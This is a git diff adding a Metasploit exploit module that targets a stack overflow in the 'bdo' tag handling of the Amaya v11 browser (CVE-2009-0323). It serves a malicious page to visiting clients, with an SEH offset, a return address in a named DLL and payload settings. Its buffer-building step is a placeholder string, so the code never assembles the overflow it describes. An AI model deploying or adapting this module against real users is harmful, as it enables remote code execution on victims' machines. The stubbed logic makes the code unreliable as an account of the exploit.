diff --git a/modules/exploits/windows/browser/amaya_bdo.rb b/modules/exploits/windows/browser/amaya_bdo.rb new file mode 100644 index 0000000000..028558a33b --- /dev/null +++ b/modules/exploits/windows/browser/amaya_bdo.rb @@ -0,0 +1,84 @@ +## +# $Id: amaya_bdo.rb +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + + include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::Remote::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Amaya Browser v11.0 bdo tag overflow', + 'Description' => %q{ + This module exploits a stack overflow in the Amaya v11 Browser. + By sending an overly long string to the "bdo" + tag, an attacker may be able to execute arbitrary code. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'dookie, original exploit by Rob Carter' ], + 'Version' => '$Revision: 6812 $', + 'References' => + [ + [ 'CVE', '2009-0323' ], + [ 'OSVDB', '55721' ], + [ 'BID', '33046, 33047' ], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'Space' => 970, + 'BadChars' => "\x00", + 'StackAdjustment' => -3500, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Amaya Browser v11', { 'Offset' => 6889, 'Ret' => 0x02101034 } ], # wxmsw28u_core_vc_custom.dll + ], + 'DisclosureDate' => 'Jan 28 2009', + 'DefaultTarget' => 0)) + end + + + def on_request_uri(cli, request) + # Re-generate the payload + return if ((p = regenerate_payload(cli)) == nil) + + # Set the exploit buffer + sploit = "pwned!" + + print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") + + # Transmit the response to the client + send_response_html(cli, sploit) + + # Handle the payload + handler(cli) + end + +end